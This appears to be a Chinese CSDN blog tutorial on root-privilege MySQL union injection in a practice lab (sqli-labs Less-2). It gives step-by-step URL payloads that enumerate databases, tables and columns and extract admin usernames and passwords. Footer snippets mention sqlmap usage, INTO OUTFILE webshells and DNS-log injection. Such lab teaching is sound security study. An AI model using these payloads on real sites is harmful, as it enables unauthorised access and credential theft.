MySQL注入之高权限注入

已于 2022-03-17 17:48:00 修改
阅读量1.2k 收藏 1
点赞数
文章标签: mysql 数据库 web安全
于 2022-03-17 17:38:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao_he0123/article/details/123554111
版权

MySQL注入之高权限注入

前言

在数据库中有database,schema,table,user,行,列容易被混淆之间的关系
他们之间的关系可以这样理解:
database是一个家,schema就是这个家里面的各个房间,table就是各个房间里的床,行列就是床上面的东西,user就是指这个家的主人

二、高权限注入

1.什么是高权限注入

在上一篇博文中有提到数据库的构成:
数据库A=网站A(同时又一个用户 A)
表名
列名
数据
数据库B=网站B(同时又一个用户B)
表名
列名
数据
这里的用户又分为普通用户和高级用户(eg.root),普通用户只能访问到自己库内的内容,而高级用户就可以做到跨库查询(就是对A,B库的内容都可以读取)

2.跨库查询思路

1.查看用户名

(之前步骤在上一篇博文中有就不进行重复)
是root所以可以进行高权限注入
在这里插入图片描述

2.获取所有的数据库名

http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,group_concat(schema_name),3 from information_schema.schemata

在这里插入图片描述

3.获取指定数据库名下的表名信息

这里我已’damicms‘为例

http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,group_concat(table_name),3 from information_schema.tables where
table_schema=‘damicms’

在这里插入图片描述

4.获取指定damicms下的表名admin下的列名信息

http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,gruop_concat(column_name),3 from information_schema.columns where
table_name=‘dami_admin’ and table schema=‘damicms’

在这里插入图片描述

4.获取damicms下的admin中的数据

我们要获取后台登陆信息一般都在admin下所以我们去获取admin的数据

http://www.5418666.xyz/sql/Less-2/?id=-1 union select
1,username,password from damicms.dami_admin

在这里插入图片描述

just a leaf
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
concat mysql sql注入_MySQL注入总结
weixin_32572129的博客
01-12 676
01 MySQL数据库结构及常用函数一、MySQL数据库结构MySQL数据库采用库=>表=>列=>数据的存储结构,这样的存储结构影响着我们后续的注入过程。1. MySQL内置库在MySQL(版本>=5.7)中除了用户自建的如admin等数据库,还有一些MySQL自带的数据库,这些数据库中存储着MySQL的关键信息:库名功能mysql保存有账户信息、权限信息、存储过程等sys...
mysql注入-sqlilabs靶场注入
10-15
MySQL注入是一种常见的网络安全漏洞,主要发生在应用程序中,当用户输入的数据未经充分验证或过滤就直接用于构造SQL查询时。SQL注入攻击者可以利用这个漏洞执行恶意的SQL命令,获取、修改、删除数据库中的敏感信息,...
SQL注入-Mysql权限读写注入
xiaoheizi的博客
06-28 318
1.读写文件时需要知道文件路径,而有的网站会泄露phpinfo.php文件,在phpinfo.php文件中就可以收集路径信息,如:$_SERVER['SCRIPT_FILENAME']就是当前执行脚本的路径。绕过:注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过。-1 union select null,'null',null,null 正常。-1 union select null,null,'null',null 正常。执行命令,让日志记录后门代码。
mysql注入之dns注入
seek_2022的博客
05-03 1975
文章目录一、DNS-LOG使用(域名解析日志)(一)DNS简介(二)LOG日志是怎么产生的?(三)DNS-LOG在渗透测试中的应用二、DNS注入相关知识回顾(一)load_file() 读取文件(二)UNC路径(三)绕靶场WAF三、DNS注入靶场实战(一)判断SQL注入(一)绕靶场WAF(二)查询库名(三)查询表名(四)查询字段名(五)查询并提交flag四、小结 一、DNS-LOG使用(域名解析日志) (一)DNS简介 DNS(域名解析)是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一
SQL注入MySQL注入
weixin_51583033的博客
12-20 843
SQL注入MySQL注入
mysql 注入语句_MYSQL注入语句
weixin_33007509的博客
01-18 1163
一、信息查询 information_schema是MySQL 5.0后产生的虚拟数据库,提供访问数据库元数据的方式,即数据的数据。比如数据库所有库名或表名,列类型,访问权限MYsql 5.X以上版本的注入查询主要基于information_schem1.UNION 注入 (联合查询注入) ≥ MySQL 5 information_schema (信息数据库),其中保存着关于 My...
sqlmap注入mysql_sqlmap之mysql root权限注入
weixin_31282885的博客
01-19 526
遇到一mysql root权限注入点,尝试用sqlmap进一步渗透获取更高权限,具体如下:判断注入点的当前用户和当前数据库./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1"...
sql注入mysql权限问题
不想当脚本小子的脚本小子
02-13 413
有道云笔记链接:http://note.youdao.com/noteshare?id=0e4d59cda87bd2e8d2a864b1aa0e3210&sub=A8D1F4C0629B4A5ABAF405920ADD10E4
SQL注入MYSQL注入
av11566的博客
04-19 7123
前言 MYSQL注入中首先要明确当前注入权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
Mysql注入
天天学安全专属博客
10-28 4262
mysql注入,包括union注入数据库跨库注入,常见的注入绕过方法和数据库文件读写
SQL Injection with MySQL 注入分析
09-14
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的数据库系统,如MySQL。此技术允许攻击者通过输入恶意SQL代码来操纵或获取数据库中的敏感信息。本文将深入探讨MySQL数据库的SQL注入问题,以及...
mysql5 注入漏洞
10-30
MySQL5注入漏洞是一种常见的安全问题,它发生在应用程序与数据库交互时,由于不恰当的数据过滤或错误的查询构造,使得攻击者能够向SQL语句中插入恶意代码,从而获取、修改、删除数据库中的敏感信息,甚至控制整个...
MySQL解决SQL注入的另类方法详解
09-10
MySQL中,防止SQL注入有多种方法,包括使用预编译语句、参数化查询、转义特殊字符等。本文主要探讨一些非传统的、另类的方法来解决SQL注入问题。 首先,我们来看问题的本质。当用户输入被直接插入到SQL语句中时,...
PHP+Mysql 带SQL注入源码 下载
04-25
【PHP+MySQL与SQL注入】 在互联网开发中,PHP与MySQL是常见的组合,用于构建动态网站和...在日常开发中,应始终遵循最佳实践,使用预处理语句,限制数据库用户的权限,并定期进行安全性审计,以防止SQL注入等攻击。
MySQL的面试题,从简单到困难三道题目
在那一刻,我们或许会发现自己站在了时间的另一岸,以更加成熟和宽广的胸怀,去拥抱那份隔代相传的深情。
07-25 474
需要注意的是,虽然哈希索引在某些场景下具有优势,但由于其不支持范围查询和排序操作,且哈希冲突会影响性能,因此在大多数情况下,B+Tree索引仍然是MySQL中最常用的索引类型。
linux mysql 定时备份
java小白白之没有最白的博客
07-25 252
加入以下内容(/xp/server/mysql/bin/mysqldump是你的mysqldump备份命令,一般如果是正常安装的,可以直接用全局命令mysqldump,不用带前面的路径)4、编写crontab。5、查看是否添加成功。
AutoMySQLBackup execution.. Backup failed Docker部署mysql 自动备份失败!!
童龙辉的博客
07-25 858
Using a password on the command line interface can be insecure. mysqldump: [Warning] Using a password on the command line interface can be insecure. mysqldump: Couldn't execute 'SELECT COLUMN_NAME, JSON_EXTRACT(HISTOGRAM, '$."number-o
数据库(MySQL)-视图、存储过程、触发器
最新发布
weixin_64975807的博客
07-25 984
存储过程(Stored Procedure)是在大型数据库系统中,一组为了完成特定功能的SQL 语句集,存储在数据库中,经过第一次编译后,再次调用不需要重复编译,用户通过指定存储过程的名字并给出参数 (如果该存储过程带有参数)来执行它。触发器是数据库中针对数据库表操作触发的 特殊的存储过程。
突破MySQL安全注入技巧与权限分析
1. **MySQL注入与Shell植入**: - 使用`SELECT`语句的`INTO OUTFILE`特性,可以将恶意代码写入文件系统,如`SELECT 'payload' INTO OUTFILE '/path/to/webshell'`。这需要满足两个条件: - 知道绝对路径,比如`/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值